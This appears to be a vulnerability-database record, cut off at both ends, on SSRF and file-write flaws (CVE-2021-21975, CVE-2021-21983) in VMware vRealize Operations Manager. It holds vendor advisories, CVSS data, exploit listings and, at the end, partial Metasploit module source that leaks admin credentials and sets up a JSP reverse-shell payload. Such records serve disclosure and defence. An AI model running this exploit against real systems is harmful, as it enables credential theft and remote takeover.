previously mentioned in this advisory were found to only have partially resolved CVE-2021-21975 leaving a residual risk of moderate severity (CVSS = 4.3). Hotfixes created to resolve the vulnerabilities documented in [VMSA-2021-0018](<https://www.vmware.com/security/advisories/VMSA-2021-0018.html>) also include complete fixes for CVE-2021-21975. \n \n[2] vRealize Operations Manager 8.4.0 shipped with the aforementioned incomplete fixes, and is therefore partially impacted by CVE-2021-21975.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-03-30T00:00:00", "type": "vmware", "title": "VMware vRealize Operations updates address Server Side Request Forgery and Arbitrary File Write vulnerabilities (CVE-2021-21975, CVE-2021-21983)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "VMSA-2021-0004.1", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0004.1.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2022-11-02T11:54:13", "description": "3a. Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) \n\nThe vRealize Operations Manager API contains a Server Side Request Forgery. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of 8.6. \n\n3b. Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) \n\nThe vRealize Operations Manager API contains an arbitrary file write vulnerability. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of 7.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-30T00:00:00", "type": "vmware", "title": "VMware vRealize Operations updates address Server Side Request Forgery and Arbitrary File Write vulnerabilities (CVE-2021-21975, CVE-2021-21983)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-08-24T00:00:00", "id": "VMSA-2021-0004.2", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0004.2.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2022-05-26T00:56:14", "description": "3\\. Advisory Details \n\nA URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-04-01T00:00:00", "type": "vmware", "title": "VMware Carbon Black Cloud Workload appliance update addresses incorrect URL handling vulnerability (CVE-2021-21982)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21982"], "modified": "2021-04-01T00:00:00", "id": "VMSA-2021-0005", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0005.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "attackerkb": [{"lastseen": "2022-10-30T15:47:25", "description": "Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) prior to 8.4 may allow an authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.\n\n \n**Recent assessments:** \n \n**wvu-r7** at April 03, 2021 7:41am UTC reported:\n\nPlease see [CVE-2021-21975\u2019s Rapid7 analysis](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis>). CVE-2021-21975 can be chained with CVE-2021-21983 to achieve unauthed RCE.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-21983", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-06T00:00:00", "id": "AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "href": "https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2022-10-24T20:08:54", "description": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 31, 2021 10:35pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis>) or [CVE-2021-21983\u2019s assessment](<https://attackerkb.com/assessments/fce71f33-eb17-490f-a80e-c4cd5059e0dc>).\n\n**Update:** According to GreyNoise, [attackers are scanning for CVE-2021-21975](<https://twitter.com/nathanqthai/status/1379888484865957891>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-21975", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-06-05T00:00:00", "id": "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95", "href": "https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-02-01T00:00:00", "description": "<b>[CVE-2021-21975] VMware vRealize Operations Manager API Serve...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-02T21:14:06", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-10-24T06:02:36", "id": "D5702470-2A4B-5116-9B9F-4001BDD6935C", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "## Impacted Products\r\n\r\n- VMware vRealize Operations 8.3.0\u30018.2.0...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T15:40:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-11-08T08:21:55", "id": "29AADC8A-DEC3-59E3-BF20-A227E39A5083", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-19T19:57:08", "description": "# REALITY_SMASHER\nvRealize RCE + Privesc (CVE-2021-21975, CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-06T23:24:38", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2022-02-19T17:06:47", "id": "911A7F63-1DBC-54A3-820C-F8F19E006338", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-16T14:28:37", "description": "<b>[CVE-2021-21975] VMware vRealize Operations (vROps) Manager A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-16T11:56:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2022-03-16T13:53:28", "id": "33268543-6217-5EB6-9E15-3AD5A03E3B8E", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-21T15:56:32", "description": "# VMWare-vRealize-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T12:56:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-05-21T13:18:48", "id": "1E8AE40F-314C-5935-B6FB-4F9B8A73A0E4", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# VMWare-CVE-2021-21975\n\n# VMWare-CVE-2021-21975 SSRF vulnerabil...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-10T12:36:07", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2021-12-03T00:24:52", "id": "7663BC50-C08E-5741-B771-BE50606E7B78", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-23T13:06:08", "description": "# CVE-2021-21975\n\n#SSRF-POC - ssrf to cred leak\n\n#First configur...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T13:33:45", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-07-23T07:58:27", "id": "35114B1B-006F-5732-8E42-9E8643B61C2A", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-30T20:26:21", "description": "# CVE-2021-21975\nNmap script to check vulnerability CVE-2021-219...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-01T21:59:05", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-07-30T17:32:47", "id": "7A372D54-3708-5032-B00A-2B54C2137FB7", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-25T19:01:57", "description": "## 0x01 \u6ce8\n\u8be5\u9879\u76ee\u4ec5\u4f9b\u5408\u6cd5\u7684\u6e17\u900f\u6d4b\u8bd5\u4ee5\u53ca\u7231\u597d\u8005\u53c2\u8003\u5b66\u4e60\uff0c\u8bf7\u5404\u4f4d\u9075\u5b88\u300a\u4e2d\u534e\u4eba\u6c11\u5171\u548c\u56fd\u7f51\u7edc\u5b89\u5168\u6cd5\u300b\u4ee5\u53ca\u76f8\u5e94\u5730\u65b9\u7684\u6cd5\u5f8b\uff0c\u7981\u6b62\u4f7f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-01T01:14:20", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-22005", "CVE-2021-26295"], "modified": "2022-03-25T11:15:15", "id": "4A8A9FBD-F634-579A-8E0A-49AA84D733A8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "metasploit": [{"lastseen": "2022-11-02T03:03:48", "description": "This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth file write (CVE-2021-21983) in VMware vRealize Operations Manager to leak admin creds and write/execute a JSP payload. CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate endpoint. Code execution occurs as the \"admin\" Unix user. The following vRealize Operations Manager versions are vulnerable: * 7.0.0 * 7.5.0 * 8.0.0, 8.0.1 * 8.1.0, 8.1.1 * 8.2.0 * 8.3.0 Version 8.3.0 is not exploitable for creds and is therefore not supported by this module. Tested successfully against 8.0.1, 8.1.0, 8.1.1, and 8.2.0.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-21T15:42:10", "type": "metasploit", "title": "VMware vRealize Operations (vROps) Manager SSRF RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-05-06T23:30:20", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VROPS_MGR_SSRF_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vrops_mgr_ssrf_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth\n file write (CVE-2021-21983) in VMware vRealize Operations Manager to\n leak admin creds and write/execute a JSP payload.\n\n CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and\n CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate\n endpoint. Code execution occurs as the \"admin\" Unix user.\n\n The following vRealize Operations Manager versions are vulnerable:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n * 8.3.0\n\n Version 8.3.0 is not exploitable for creds and is therefore not\n supported by this module. Tested successfully against 8.0.1, 8.1.0,\n 8.1.1, and 8.2.0.\n },\n 'Author' => [\n 'Egor Dimitrenko', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21975'], # SSRF\n ['CVE', '2021-21983'], # File write\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'],\n ['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'],\n ['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-03-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false,\n 'Targets' => [\n ['vRealize Operations Manager < 8.3.0', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SRVPORT' => 8443,\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs\n ARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa\n ]\n },\n 'Stance' => Stance::Aggressive\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def setup\n super\n\n @creds = nil\n\n print_status('Starting SSRF server...')\n start_service\n end\n\n def check\n leak_admin_creds ? CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@creds ||= leak_admin_creds)\n\n write_jsp_payload\n execute_jsp_payload\n end\n\n def leak_admin_creds\n # \"Comment out\" trailing path using URI fragment syntax, ostensibly\n ssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\"\n\n print_status('Leaking admin creds via SSRF...')\n vprint_status(ssrf_uri)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'),\n 'ctype' => 'application/json',\n 'data' => [ssrf_uri].to_json\n )\n\n unless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri\n print_error('Failed to send SSRF request')\n return\n end\n\n unless @creds\n print_error('Failed to 